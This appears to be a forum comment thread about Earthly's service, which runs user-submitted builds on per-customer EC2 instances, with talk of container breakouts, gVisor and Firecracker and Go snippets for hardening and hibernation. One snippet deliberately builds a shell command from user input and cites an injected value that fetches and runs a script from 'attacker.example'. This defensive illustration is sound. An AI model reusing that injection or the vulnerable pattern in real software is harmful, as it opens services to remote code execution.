
Thanks for sharing this. One of the authors here.

We built a service that executes arbitrary user-submitted code. An RCE service. It's the thing you're not supposed to build, but we had to do it.

Running arbitrary code means containers weren't a good fit (container breakouts happen), so we spin EC2 instances up and down instead. This means we have actual infrastructure as code (i.e. not just piles of Terraform, but Go code running in a service that spins VMs up and down based on API calls).

The service spins up and down EC2 instances based on user requests and executes user-submitted build scripts inside them.

It's not the standard web service we were used to building, so we thought we'd write it up and share it with anyone interested.

One cool thing we learned was how quickly you can hibernate and wake up x86 EC2 instances. That ended up being a game-changer for us.

Corey and Brandon did the building; I'm mainly just the person who wrote things down, but hopefully people find this interesting.




Container breakouts are rare, and they typically require that the attacker be able to control the container creation parameters and/or the actual image being run. If you control those things and apply process-isolation best practices (seccomp, cap drops, etc.), then you are in pretty good shape.

Source: ran a container-based RCE service that ran millions of arbitrary workloads per month. We had sophisticated network and system anomaly detection, high-priced pentesters, etc., and never had a breakout.
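For anyone wondering what "seccomp, cap drops, etc." looks like in practice, here's a minimal sketch using the Docker Go SDK. The image, seccomp profile path, and resource limits are placeholders, not the actual setup described above.

```go
// A minimal hardening sketch with the Docker Go SDK; image, seccomp profile
// path, and resource limits are placeholders.
package sandbox

import (
	"context"

	"github.com/docker/docker/api/types/container"
	"github.com/docker/docker/client"
)

// createUntrusted creates (but does not start) a locked-down container for an
// arbitrary user workload: no capabilities, no new privileges, a tightened
// seccomp profile, read-only rootfs, no network, and hard resource limits.
func createUntrusted(ctx context.Context, image string, cmd []string) (string, error) {
	cli, err := client.NewClientWithOpts(client.FromEnv, client.WithAPIVersionNegotiation())
	if err != nil {
		return "", err
	}
	pids := int64(128)
	resp, err := cli.ContainerCreate(ctx,
		&container.Config{
			Image: image, // operator-controlled image, never user-supplied
			Cmd:   cmd,
			User:  "65534:65534", // run as nobody, not root
		},
		&container.HostConfig{
			CapDrop:        []string{"ALL"},
			SecurityOpt:    []string{"no-new-privileges", "seccomp=/etc/sandbox/seccomp.json"}, // placeholder profile path
			ReadonlyRootfs: true,
			NetworkMode:    "none",
			Resources: container.Resources{
				Memory:    512 * 1024 * 1024, // 512 MiB
				NanoCPUs:  1_000_000_000,     // one CPU
				PidsLimit: &pids,             // curb fork bombs
			},
		},
		nil, nil, "")
	if err != nil {
		return "", err
	}
	return resp.ID, nil // start it with cli.ContainerStart and wait on it separately
}
```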


> ... never had a breakout.

Would "never detected a breakout" be better wording? :)


> We had sophisticated network and system anomaly detection, high priced pentesters

I assume GP wrote that in order to say that they have a high confidence that they never actually had a breakout.

You are technically correct. But your logic applies to everything. Is the isolation provided by VMs good enough? Is airgapping enough to prevent breakout?

There are many things that factor in when you decide what's reasonable. Some are first-principles arguments (containers use the same kernel as the host, the kernel has a large attack surface, ...). Others are statistical arguments: there have been past breakouts with this stack, so it's reasonable to expect more in the future, ...


Interesting! What was the service? In our case we control the container, which is buildkitd, but it has to be run privileged, which means lots of solutions are off the table.


Rather not say. Yeah, building and then running containers where users get to pick the base image is a risk.

We found that privileged is a pretty big hammer. We thought we needed it too, but we found ways to get the functionality we needed without all the extra access that privileged brings in.


Have you used things like gVisor?


I would suggest also looking at https://github.com/bazelbuild/remote-apis. It's essentially a standard API for remote (any binary) execution as a service, and there are several reference implementations of it (BuildGrid, BuildBarn, Google's own service, etc.).

And you can consider using gVisor to minimize container breakouts to a great extent.


I'll check out that remote-apis link.

gVisor was considered, but so far it looks like the next iteration will be using Firecracker VMs. Our backend is buildkit and it can't run in gVisor containers without some work.


Firecracker looks great but it requires bare metal instances or nested virtualization (which is not supported by EC2 instances IIRC).

How do you run firecracker?


EC2 metal instances are expensive but they let you run FC.


> One cool thing we learned was how quickly you can hibernate and wake up x86 EC2 instances. That ended up being a game-changer for us.

Could you talk more about it? Are you keeping a cache of hibernated EC2 instances and re-launching them per request? What sort of relaunch latency profile do you see as function of instance memory size?


A specific EC2 instance is always serving at most one customer. And builds are highly cacheable, so the EC2 instance has an EBS volume on it with a big cache that Earthly uses to prevent rework.

That instance is just sitting around waiting for gRPC requests that tell it to run another build. If it's idle for 30 minutes, it hibernates, and then if another call comes in, a gRPC proxy wakes it back up.

I don't know if the wake-up time increases with the size of the cache in memory; I can check with Brandon. But it's much faster than starting up an instance cold, mainly because buildkit is designed for throughput, not quick startup.

There are more details in the blog.
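For the curious, the hibernate-on-idle / wake-on-request flow described above could look roughly like this sketch with aws-sdk-go-v2. The helper names, timeout, and lifecycle wiring are hypothetical; this isn't Earthly's actual code.

```go
// Hypothetical sketch, assuming aws-sdk-go-v2. The 2-minute wait and helper
// names are illustrative, not Earthly's actual service code.
package lifecycle

import (
	"context"
	"time"

	"github.com/aws/aws-sdk-go-v2/aws"
	"github.com/aws/aws-sdk-go-v2/service/ec2"
)

// hibernateIdleInstance stops the customer's instance with hibernation enabled,
// so RAM (including the warm build state) is persisted to the EBS root volume.
func hibernateIdleInstance(ctx context.Context, client *ec2.Client, instanceID string) error {
	_, err := client.StopInstances(ctx, &ec2.StopInstancesInput{
		InstanceIds: []string{instanceID},
		Hibernate:   aws.Bool(true), // instance must have been launched with hibernation enabled
	})
	return err
}

// wakeInstance resumes a hibernated instance and blocks until EC2 reports it
// running, at which point the gRPC proxy can forward the pending build request.
func wakeInstance(ctx context.Context, client *ec2.Client, instanceID string) error {
	if _, err := client.StartInstances(ctx, &ec2.StartInstancesInput{
		InstanceIds: []string{instanceID},
	}); err != nil {
		return err
	}
	waiter := ec2.NewInstanceRunningWaiter(client)
	return waiter.Wait(ctx, &ec2.DescribeInstancesInput{
		InstanceIds: []string{instanceID},
	}, 2*time.Minute)
}
```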


how do you prevent build 1 from modifying the VM in a way that impacts build 2?

if build 1 happens to install a specific libc, do you uninstall that libc before running build 2?

if you just say that stuff is the responsibility of the user, okay, but then the artifacts produced by this system aren't deterministic, which seems like a problem?


Good question. The builds are specified in Earthfiles, which are run by our buildkit backend.

Buildkit runs the builds in runC, so basically containers are used to keep things deterministic, but the buildkit backend isn't shared; each customer is in their own EC2 instance.


if your security model assumes user code is able to break out of containers, then it also has to assume user code will be able to modify the VM

if user code can modify the VM, and VMs are stateful, then how do you ensure hermetic builds?


So the builds are specified in Earthfiles, which are run by our buildkit backend.

Buildkit runs the builds in runC, so basically containers are used to keep things deterministic, but the buildkit backend isn't shared; each customer is in their own EC2 instance.

So if you could break out or access cache entries that weren't correct, you would have found a way to break reproducibility, but not a way to access anything you shouldn't.
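To make the "one backend per customer" point concrete, here's a hypothetical sketch of how a gRPC proxy could map each customer to their own dedicated buildkitd endpoint. The Router type and in-memory map are illustrative only, not Earthly's implementation.

```go
// Illustrative sketch only: a per-customer routing table, not Earthly's code.
package routing

import (
	"context"
	"fmt"
	"sync"

	"google.golang.org/grpc"
	"google.golang.org/grpc/credentials/insecure"
)

// Router maps each customer to the address of the single buildkitd instance
// dedicated to them, so no backend is ever shared across tenants.
type Router struct {
	mu        sync.RWMutex
	endpoints map[string]string // customer ID -> that customer's buildkitd address
}

// ConnFor dials the one instance serving this customer. Builds from different
// customers can never land on the same backend, because each customer ID
// resolves to exactly one dedicated EC2 instance.
func (r *Router) ConnFor(ctx context.Context, customerID string) (*grpc.ClientConn, error) {
	r.mu.RLock()
	addr, ok := r.endpoints[customerID]
	r.mu.RUnlock()
	if !ok {
		return nil, fmt.Errorf("no instance provisioned for customer %s", customerID)
	}
	// Plaintext credentials keep the sketch short; a real proxy would use mTLS.
	return grpc.DialContext(ctx, addr, grpc.WithTransportCredentials(insecure.NewCredentials()))
}
```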


ah, okay, so you're using containers, you're running those containers on VMs that are per-customer rather than shared/multi-tenant, and the post is about optimizing how those VMs are managed -- got it

> but the buildkit backend isn't shared, each is in own EC2 instance

it isn't shared between different customers, but it is shared between different builds for the same customer, right?


While container breakouts do happen, they're pretty rare. I'd be more concerned about any potential injection vectors in the Go code, which could lead to a cloud breach if you're not careful ;)


There have been a bunch of Linux kernel privesc vulns that can be converted into container breakouts from standard Linux containers; just look at the bounties from Google's kCTF (AFAIK they've had 10 different kernel vulns in 2 years).

It's possible to mitigate/reduce them for sure, with appropriate hardening, but the Linux kernel is still quite a big attack surface.


What about kernels like seL4? I think everyone will abandon monolithic kernels one day because they have too much attack surface.


Is anyone running normal workloads (node/java/php/python/whatever) on seL4 without sticking Linux in the middle?


Oh interesting. What were you imagining as the injection vector?

The Earthly backend runs on a modified buildkit, so it is running the arbitrary code in a container, but it's also in its own VM. This was simpler than Firecracker to get started with, but turned out to have pretty good performance and alright cost once we started suspending things.


More like if you're running `provision --vm-name "$UserSuppliedData"` or similar. I don't know how you've built your wrapping tool, so I can't comment on how likely it would be, but I've seen such breakages IRL (I break things for a living ;) )


Good point. We do have things locked down pretty well in our Go code, though. The instances can only be provisioned through an API, and that API doesn't allow arbitrary user-supplied input.
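To illustrate the pattern being discussed: the risky version shells out with user-controlled data, while the safer version only ever passes it as typed API parameters. The AMI ID, instance type, and function names below are placeholders, not Earthly's provisioning code.

```go
// Placeholders throughout (AMI ID, instance type, function names); this is an
// illustration of the injection-vs-typed-API contrast, not real provisioning code.
package provision

import (
	"context"
	"os/exec"

	"github.com/aws/aws-sdk-go-v2/aws"
	"github.com/aws/aws-sdk-go-v2/service/ec2"
	"github.com/aws/aws-sdk-go-v2/service/ec2/types"
)

// Risky pattern: user-supplied data ends up inside a shell command line.
// A "name" like `x; curl https://attacker.example/pwn.sh | sh` runs as the service.
func provisionViaShell(userSuppliedName string) error {
	cmd := exec.Command("sh", "-c", "provision --vm-name "+userSuppliedName)
	return cmd.Run()
}

// Safer pattern: user data is passed only as a typed API parameter (here, a tag
// value), so nothing user-controlled is ever parsed or interpreted by a shell.
func provisionViaAPI(ctx context.Context, client *ec2.Client, customerID string) error {
	_, err := client.RunInstances(ctx, &ec2.RunInstancesInput{
		ImageId:      aws.String("ami-0123456789abcdef0"), // placeholder AMI
		InstanceType: types.InstanceTypeC5Large,
		MinCount:     aws.Int32(1),
		MaxCount:     aws.Int32(1),
		TagSpecifications: []types.TagSpecification{{
			ResourceType: types.ResourceTypeInstance,
			Tags:         []types.Tag{{Key: aws.String("customer"), Value: aws.String(customerID)}},
		}},
	})
	return err
}
```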


I had the impression that's what fly.io was doing.

Converting Docker images to run in VMs instead of containers.


Fly uses Firecracker like AWS Lambda, not full-fledged VMs like EC2.


That’s not accurate. Fly creates an FC VM from a Dockerfile but injects a pid 1 supervisor, and it behaves more like EC2 than Lambda (no 15-minute execution limit, for instance).


Did you consider using firecracker?


Yeah, we totally did, and Corey has actually been playing around with a POC for backing this with Firecracker. It's likely the next revision of this will use Firecracker.

So it wasn't so much disqualified as decided it wouldn't be the v1 solution. We wanted to get something out, get people on it, and get feedback, so we weren't afraid to spend some more compute dollars to do so.



